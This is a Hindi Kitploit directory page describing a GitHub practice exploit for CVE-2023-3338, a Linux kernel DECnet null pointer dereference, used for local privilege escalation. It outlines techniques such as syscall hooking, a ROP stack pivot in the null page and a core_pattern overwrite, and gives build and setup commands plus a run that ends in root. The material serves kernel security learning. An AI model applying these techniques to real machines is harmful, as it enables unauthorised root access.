Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/turtlearm/cve-2023-3338-decpwn
विशेषाधिकार वृद्धिशोषणलर्निंग और शिक्षाबाइनरी शोषणलैब और अभ्यास
GitHubturtlearm/cve-2023-3338-decpwn

CVE-2023-3338-DECPwn

लिनक्स कर्नेल LPE अभ्यास एक NPD कमजोरी के साथ

रिपॉजिटरी देखें
35733 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DECPwn

मेरे DECnet भेद्यता और नल पेज मैपिंग सक्षम के साथ विभिन्न Linux कर्नेल शोषण तकनीकों का अभ्यास।


परिदृश्य

  • सब कुछ अक्षम: qemu-system-x86_64 -append "nosmap nosmep nopti nokaslr"

    कोड निष्पादन को यूज़रलैंड में output फ़ंक्शन पर रीडायरेक्ट किया जाता है, जो commit_creds(prepare_kernel_cred(0)) को कॉल करता है।

  • सिस्कॉल हुकिंग

    mkdir सिस्टम कॉल हैंडलर पते को sys_call_table के अंदर एक फ़ंक्शन से बदलें जो परिदृश्य 1 के समान हो।

  • SMEP और KPTI सक्षम: qemu-system-x86_64 -append "nosmap nokaslr"

    कोड निष्पादन को एक स्टैक पिवट पर रीडायरेक्ट किया जाता है जो $rsp को नल पेज में एक ROP श्रृंखला पर सेट करता है।

  • यूज़रमोड हेल्पर

    core_pattern sysctl को ओवरराइट किया जाता है ताकि कोर डंप करते समय उच्च विशेषाधिकारों के साथ चलने के लिए एक कमांड निर्दिष्ट किया जा सके।

    प्रोग्राम को फिर SIGABRT सिग्नल से बाधित किया जाता है ताकि यूज़रमोड स्क्रिप्ट को ट्रिगर किया जा सके।

निर्माण

root@kitploit:~
apt install libdnet
gcc -o lpe lpe.c -ldnet
gcc -o lpe-core_pattern lpe-core_pattern.c -ldnet
gcc -o lpe-nosmep lpe-nosmep.c -ldnet -no-pie
gcc -o lpe-syscall lpe-syscall.c -ldnet -no-pie

चलाएं

DECnet को रूट के रूप में कॉन्फ़िगर करें:

root@kitploit:~
sysctl -w vm.mmap_min_addr="0" # 0x1000
echo -n "1.10" > /proc/sys/net/decnet/node_address

अनप्रिविलेज्ड उपयोगकर्ता के रूप में एक्सप्लॉइट चलाएं:

root@kitploit:~
$ ./lpe
[*] Saved state
[*] Triggering NPD
[*] Returned to userland
[*] UID: 0, got root!
#
टूल डाउनलोड करें